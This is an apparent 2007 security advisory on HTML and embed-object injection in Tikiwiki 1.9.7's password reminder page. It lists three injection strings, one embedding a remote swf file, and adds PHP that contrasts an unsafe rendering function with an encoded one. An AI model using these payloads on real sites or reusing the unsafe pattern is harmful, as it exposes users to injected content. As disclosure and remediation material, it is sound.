Tikiwiki 1.9.7 HTML/embed object injection
- From: morin.josh@xxxxxxxxx
- Date: 24 Aug 2007 06:57:59 -0000
Tikiwiki
Version: 1.9.7
Example Address:
http://example.com/tiki-remind_password.php
Overview:
The following HTML can be injected into the password reminder page by entering it in the user name input box and clicking the "send me my password" button.
Examples:
1. <br><br><b><u>XSS</u></b>
2. <EMBED SRC="http://site.com/xss.swf"
3. <html><fontcolor="Red"><b>Pwned</b></font></html>
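
The usual remedy for this class of bug is to encode the submitted user name at the point where it is written back into the page. The PHP below is an added example, not Tikiwiki's code and not part of the original report: the function names, the "Unknown user" message and the user-name pattern are assumptions, and the sample inputs are the three strings listed above.

```php
<?php
// Hypothetical stand-in for a password-reminder handler (not Tikiwiki source).

// Vulnerable pattern: the submitted user name is concatenated into the page as-is.
function render_unknown_user_unsafe(string $username): string
{
    return '<div class="error">Unknown user: ' . $username . '</div>';
}

// Hardened pattern: encode HTML metacharacters when writing the value out.
function render_unknown_user_safe(string $username): string
{
    $encoded = htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="error">Unknown user: ' . $encoded . '</div>';
}

// Input-side check as defence in depth. The allowed character set and the
// 64-character limit are assumed policy, not taken from Tikiwiki.
function is_plausible_username(string $username): bool
{
    return preg_match('/\A[A-Za-z0-9_.@-]{1,64}\z/', $username) === 1;
}

// Count tag openers in rendered HTML; the template itself contributes
// exactly two (<div ...> and </div>), so anything above that was injected.
function injected_tag_count(string $html): int
{
    return preg_match_all('/<[a-z\/]/i', $html) - 2;
}

// Sample inputs: the three strings from the advisory's examples.
$samples = [
    '<br><br><b><u>XSS</u></b>',
    '<EMBED SRC="http://site.com/xss.swf"',
    '<html><fontcolor="Red"><b>Pwned</b></font></html>',
];

foreach ($samples as $i => $input) {
    printf(
        "sample %d: unsafe=%d injected tag(s), safe=%d, passes name check=%s\n",
        $i + 1,
        injected_tag_count(render_unknown_user_unsafe($input)),
        injected_tag_count(render_unknown_user_safe($input)),
        is_plausible_username($input) ? 'yes' : 'no'
    );
}
```

Output encoding is the control that matters here; the input check only narrows what reaches the template and should not replace it.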